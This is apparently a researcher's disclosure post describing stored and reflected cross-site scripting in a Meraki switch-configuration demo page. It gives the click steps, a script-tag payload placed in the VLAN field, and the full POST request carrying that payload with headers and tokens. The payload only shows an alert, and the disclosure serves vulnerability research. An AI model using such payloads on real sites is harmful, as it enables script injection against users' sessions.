Stored and reflected Cross-Site Scripting in meraki.com

I have found two XSS vulnerabilities in one simple process of creating a new switch interface.

Below are the details.

  1. Navigate to “Access Switches Tour” -> “Switch” -> “Configure” -> “Routing and DHCP”.
  2. Click the “Add an interface” button and fill “Name”, “Interface IP” and “DHCP server IPs” with whatever data. As the VLAN put the following payload: 1<script>alert(‘https://lubi.cz’)</script>
  3. Click the “Save” button. There will be the following POST request:
POST /Live-Demo-Switch/n/kaGejdmc/manage/nodes/update_switch_l2_dhcp_relays
HTTP/1.1
Host: n140.meraki.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101
Firefox/44.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: kMHJ7LD3eYdG+QsNbr9yeJ2a+ZRiEy5g/oaYIu7Tq8k=
X-Requested-With: XMLHttpRequest
Referer:
https://n140.meraki.com/Live-Demo-Switch/n/kaGejdmc/manage/configure/switchl3
Content-Length: 232
BAYEUX_BROWSER=bdf2orkeeghvrmlirmbfivj11iq
Connection: close

id=2207616097647&l2_dhcp_relays%5B0%5D%5Bname%5D=XSS&l2_dhcp_relays%5B0%5D%5Bip%5D=1.1.1.3&l2_dhcp_relays%5B0%5D%5Bvlan%5D=1%3Cscript%3Ealert('https%3A%2F%2Flubi.cz')%3C%2Fscript%3E&l2_dhcp_relays%5B0%5D%5Brelay_ips%5D%5B%5D=1.1.1.1

Then the JavaScript code will execute (reflected XSS). It is also a stored XSS, so it will fire up everytime the user navigates to https://n140.meraki.com/Live-Demo-Switch/n/kaGejdmc/manage/configure/switchl3

Leave a Reply

Your email address will not be published. Required fields are marked *